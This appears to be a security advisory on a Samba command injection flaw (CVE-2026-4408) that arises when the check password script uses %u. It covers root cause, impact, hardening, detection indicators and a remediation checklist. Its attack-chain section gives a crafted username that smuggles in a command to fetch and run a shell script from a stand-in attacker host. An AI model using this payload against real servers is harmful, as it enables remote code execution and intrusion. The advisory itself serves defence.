Executive Summary
A high-severity OS command injection vulnerability (CVE-2026-4408) has been disclosed in Samba, the widely deployed open-source SMB/CIFS file sharing and domain controller software used on Linux, Unix, and macOS servers. The vulnerability carries a CVSS score of 9.0 and affects deployments that use the check password script configuration option with the %u username substitution character.
When %u is present in the check password script parameter, the client-supplied username is passed to the script without proper escaping or sanitization, enabling an attacker to inject arbitrary OS commands through a crafted username.
CVSS Score: 9.0 (High)
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-4408 |
| CVSS Score | 9.0 (High) |
| Type | OS Command Injection (CWE-78) |
| Attack Vector | Network |
| Privileges Required | None |
| User Interaction | None |
| Published | 2026-05-28 |
| Source | NVD / NIST |
Affected Products
| Product | Configuration | Status |
|---|---|---|
| Samba (file server mode) | check password script with %u | Vulnerable |
| Samba (classic domain controller) | check password script with %u | Vulnerable |
The vulnerability is only exploitable when the check password script directive is configured in smb.conf and the script path includes the %u variable substitution, which inserts the connecting client's username into the command line.
Technical Details
Root Cause
Samba's check password script option allows administrators to run an external script to validate passwords during authentication. The %u variable substitution inserts the username provided by the connecting client directly into the shell command constructed to invoke the script.
Because the username value originates from the client (attacker-controlled input) and is not sanitized or escaped before being embedded in the shell command, an attacker can inject shell metacharacters such as ;, &&, |, $(...), and backticks to execute arbitrary commands.
Attack Chain
1. Attacker identifies a Samba server exposing SMB on port 445 (or 139)
2. Samba smb.conf contains: check password script = /usr/local/bin/check_pass.sh %u
3. Attacker sends an authentication request with a crafted username:
e.g., username = "user; curl attacker.com/shell.sh | bash"
4. Samba constructs the command:
/usr/local/bin/check_pass.sh user; curl attacker.com/shell.sh | bash
5. Shell interprets the injected command — arbitrary code executes
6. Attacker achieves RCE with Samba daemon privileges (often root or dedicated service account)Why This Is Dangerous
Samba is ubiquitous in enterprise environments, particularly:
- Linux file servers shared with Windows clients
- Legacy domain controllers in hybrid environments
- NAS devices running Samba (many of which have internet-facing admin interfaces)
- Raspberry Pi and embedded Linux deployments in home/small business environments
The check password script feature is used to enforce custom password policies. Many organizations enable this for compliance reasons, making deployment of the vulnerable configuration more common than it might initially appear.
Impact Assessment
| Impact Area | Description |
|---|---|
| Remote Code Execution | Full arbitrary command execution with Samba daemon privileges |
| Privilege Escalation | If Samba runs as root (common on NAS/embedded), attacker gains root |
| Data Exfiltration | Access to all shared files and directories on the server |
| Lateral Movement | Pivot to other network hosts from compromised Samba server |
| Persistence | Install backdoors, cron jobs, or SSH keys for persistent access |
| Domain Compromise | On classic DC mode, potential to compromise Active Directory equivalents |
Recommendations
Immediate Actions
- Check your smb.conf — Search for
check password scriptentries containing%u:grep -i "check password script" /etc/samba/smb.conf - Remove or replace
%u— If the script must remain, rewrite it to receive the username via a secure mechanism (e.g., environment variable or stdin) rather than a command-line argument with%u - Apply the Samba security patch as soon as Samba Project releases an update for CVE-2026-4408
- Restrict SMB access at the firewall — Block external access to ports 139 and 445
Configuration Hardening
# smb.conf — safe alternatives to %u in check password script
# VULNERABLE (do not use):
# check password script = /usr/bin/check_pass.sh %u
# SAFER — pass username via environment or stdin instead:
# check password script = /usr/bin/check_pass.sh
# (Have the script read username from a named pipe or dedicated channel)Network-Level Mitigations
- Block ports 139/445 from untrusted external networks at the perimeter firewall
- Restrict Samba authentication to trusted IP ranges using "hosts allow" in smb.conf
- Deploy an IDS/IPS rule to detect shell metacharacters in SMB usernames
- Enable Samba debug logging to detect anomalous authentication patternsDetection Indicators
| Indicator | Description |
|---|---|
| Shell metacharacters in SMB auth logs | Attempted injection in username field |
| Unexpected child processes spawned by smbd | Post-exploitation code execution |
| Outbound connections from the Samba host | Potential C2 beacon or reverse shell |
| New cron jobs or SSH authorized_keys | Persistence mechanisms installed post-exploitation |
| Samba log entries with malformed usernames | Exploitation attempt indicators |
Look for entries in Samba logs (/var/log/samba/) showing usernames containing characters like ;, |, $(, `, or &&.
Post-Remediation Checklist
- Confirm smb.conf no longer uses
%uin check password script - Apply official Samba patch and verify version with
samba --version - Review Samba logs for historical evidence of exploitation attempts
- Audit all accounts on the Samba host for unauthorized additions
- Check cron jobs and startup scripts for attacker persistence
- Verify firewall rules block ports 139/445 from untrusted networks
- Scan file shares for recently modified files that may be attacker artifacts
- Update IDS/IPS signatures to detect CVE-2026-4408 exploitation patterns